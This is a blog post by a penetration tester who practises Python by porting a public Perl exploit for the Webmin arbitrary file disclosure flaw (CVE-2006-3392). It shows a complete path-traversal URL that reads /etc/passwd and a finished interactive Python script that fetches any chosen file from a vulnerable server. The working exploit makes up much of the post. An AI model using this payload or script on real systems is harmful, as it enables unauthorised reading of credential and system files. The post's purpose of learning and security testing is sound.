Rewriting Exploits: Webmin Arbitrary File Disclosure
- by Vince
-
in Blog
-
Hits: 5745
Penetration testers come from all walks of life but there are two obvious sources which I see most often -- IT and development. Each come with advantages but eventually we'll need to fill in the gaps with the knowledge of the other. My background is in IT and my skills in system and network administration run deep. I'm filling in the software development gaps though.
If you're starting out in penetration testing and you're like me, first you'll need to learn how to read code and get to a point where you understand what you're reading. It takes time but eventually, you'll see patterns and you'll recognize functions, variables, and other common syntax. You might not be able to write code from scratch at this point but you be able to understand what's going on. Once you get to this level, pick a language and rewrite what you see.
I like Python. For no particular reason, I just like it. I heard someone say that when you want to learn a language, you should start by solving a problem. And once you can write code to solve problems, you should build something. I think it's equally as helpful to take something written in one language and rewrite it in another. You already have the built example in front of you, you just want to use a different language to rebuild it.
I've been playing around with a vulnerable version of Webmin that can be exploited for an arbitrary file disclosure: CVE-2006-3392 : Webmin Arbitrary File Disclosure
Exploit-db has a Perl exploit written, EDB-ID: 2017, and when you read through it, it's not too hard to understand what's going on.
It's asking for the url, port, filename, and target. It's adding: "/unauthenticated/" and "/..%01" *40. You can literally build this into a url without using the script. It looks like this:
http://domain.com:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/
..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd
The above URL works for this exploit but that's not what we're trying to accomplish here. We want to rewrite this Perl script with Python which looks like this:
#!/usr/bin/python
# Exploit for Webmin < 1.29x
# CVE 2006-3392
# Arbitrary File Disclosure
#
import urllib2
import sys
print
print"[*] Enter target URL in the following format: http://www.domain.com:10000"
host=raw_input("[*] Enter target URL: ")
print
print"[*] Enter file target file, for example: /etc/passwd"
file=raw_input("[*] Enter target file: ")
path='/unauthenticated' + '/..%01'*40
combined=host+path+file
url = urllib2.urlopen(combined)
print
html = url.readlines()
for line in html:
sys.stdout.write(line)
print
When the script is run, we are asked two questions -- the target URL and the target file, the script does its thing and we get the same exact outcome as with the Perl script.